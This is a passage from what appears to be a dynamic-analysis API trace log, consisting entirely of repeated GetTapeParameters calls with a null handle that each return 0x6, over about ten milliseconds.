dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.494] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.494] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.494] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.494] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.494] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.494] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.494] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.494] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.495] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.496] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.497] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.498] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.499] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.500] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.501] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.502] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.503] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, 